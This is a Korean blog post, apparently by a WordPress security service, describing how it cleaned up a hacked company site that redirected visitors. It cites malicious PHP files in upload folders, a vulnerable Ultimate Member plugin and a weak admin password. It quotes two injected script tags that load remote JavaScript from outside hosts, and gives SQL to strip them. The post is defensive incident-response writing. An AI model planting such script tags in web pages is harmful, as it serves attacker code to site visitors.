워드프레스를 이용해서 제작된 회사 홈페이지 겸 쇼핑몰이 해킹을 당해 다른 사이트로 이동되는 현상이 있어서 해킹복구 작업을 진행했습니다. 호스팅은 고도호스팅을 이용하고 있었고, 테마는 머티리얼 디자인의 제퍼 테마 ( Zephyr theme )를 사용하고 있었습니다. 주문과 회원가입이 계속 이루어지고 있는 웹사이트라 호스팅에서 제공해 주는 일일 백업을 이용한 복원 작업은 불가하였고, 수동으로 악성코드 제거작업을 하였습니다.
증상
- 특정 사이트로 강제이동
- 글, 페이지 내 자바스크립트 (Javascript) 악성 코드 삽입
- 홈페이지 파일 들에 악성코드 삽입
먼저 FTP 계정과 워드프레스 관리자 계정을 받아서 해킹의 원인과 악성코드의 종류를 살펴보았습니다. FTP 로 접속을 해보니 홈페이지 루트 폴더에 문서 다운로드를 위해 별도로 다운로드 폴더를 만들어 놓았는데, 여기에 악성코드가 들어있는 PHP 파일들이 들어있었습니다. 그리고 플러그인들중에 최근에 취약점이 발견되어 문제가 되고 있는 얼티밋 멤버 (Ultimate Member) 플러그인이 있었는데, /uploads 폴더 내 이 플러그인 임시 폴더에 악성코드들이 들어있었습니다. 다른 해킹 사례와는 달리 JS 파일들은 깨끗했습니다. 그런데 이 해킹 사례의 경우 기존의 감염 사례들이 파일들만 감염을 시킨 것과 달리, 파일 뿐만 아니라 포스트 글의 내용도 변조를 해서 모든 컨텐츠에 특정 자바스크립트를 심어 놓았습니다.
바로 아래 이미지는 /wp-content/uploads/ultimatemember/temp 에 심겨져 있는 폴더와 악성코드 파일들입니다. 그 아래 이미지는 루트 폴더에 있는 다운로드 폴더 내 악성코드 파일입니다. 보통 업로드 폴더에 PHP 파일이 있으면 의심을 해볼 수 있습니다.
그리고 각 글, 페이지 컨텐츠 내에 아래와 같은 자바스크립트 코드가 심겨져 있었습니다.
<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script> <script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>
다시 정리를 해보면 해킹의 원인은 루트서버의 잘못된 폴더 생성과 권한 관리, 얼티밋 멤버 플러그인의 취약점, 쉬운 관리자 비밀번호 였고, 치료를 하기 위해서 악성코드가 담긴 파일을 삭제하고 데이터베이스에 접속해서 포스트 컨텐츠 내 있는 자바스크립트 코드를 제거하였습니다.
파일 내 악성코드들은 보통 FIND 명령어로 찾고, 제거를 하게 되는데, 고도호스팅은 보안상 이 명령어를 사용하지 못하도록 설정이 되어있어서 파일들을 전부 다른 서버로 이전을 한 다음 악성코드를 제거하고 다시 옮기는 방식으로 작업을 했습니다. 또한 MYSQL 데이터베이스도 UPDATE 와 REPLACE 명령어가 제대로 작동이 되지 않아 같은 방식으로 진행이 되었습니다.
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script>", " "); UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>", " ")
악성코드 제거 후 문제가 되었던 루트폴더의 다운로드 폴더의 위치와 폴더 권한을 조정하고, 얼티밋 멤버의 버전도 업데이트하였습니다. 다소 쉬운 관리자 비밀번호도 특수문자가 섞인 8자리 이상으로 설정을 했습니다. 작업 후에 디자인이 깨지거나 기능에 이상이 없이 정상적으로 작동이 되었습니다.
워드프레스 사이트를 운영하다보면 PDF 문서 다운로드나 추가적인 기능을 위해 홈페이지 루트 폴더에 임시 폴더를 생성해놓는 사례가 많습니다. 그런데 이때 그 폴더의 권한 설정을 제대로 해주지 않으면 해킹의 주요 원인이 됩니다. 가능하면 UPLOADS 폴더 쪽에 생성을 해주고, 권한 설정을 잘해주는 것이 필요합니다. 그리고 플러그인들의 취약점이 발견되면 그 플러그인에 대해서는 빠른 업데이트를 해주는 것이 중요합니다.
날이 갈수록 다양한 해킹 사례가 신고되고 있고, 악성코드의 심각성도 커지고 있습니다. 해킹으로 인한 피해를 입기 전에 기본 워드프레스 보안 최적화 작업은 해주시는 것을 적극 추천드립니다. 스마일보이랩에서는 직접 대응이 어려운 분들을 위해 해킹복구 및 보안최적화 서비스를 제공해 드리고 있습니다.
서비스 문의
홈페이지문의 : https://www.smileboylab.com/contact/
이메일문의 : admin@smileboylab.com
전화문의 : 02-352-0405, 02-2135-2876
톡톡 : https://talk.naver.com/ct/wc4p5h
카카오플러스친구 : http://pf.kakao.com/_yYxcRxl
Warning: file_get_contents(domain/mp3play.online.txt): failed to open stream: No such file or directory in /www/wwwroot/link123456.online/getlink/index.php on line 27
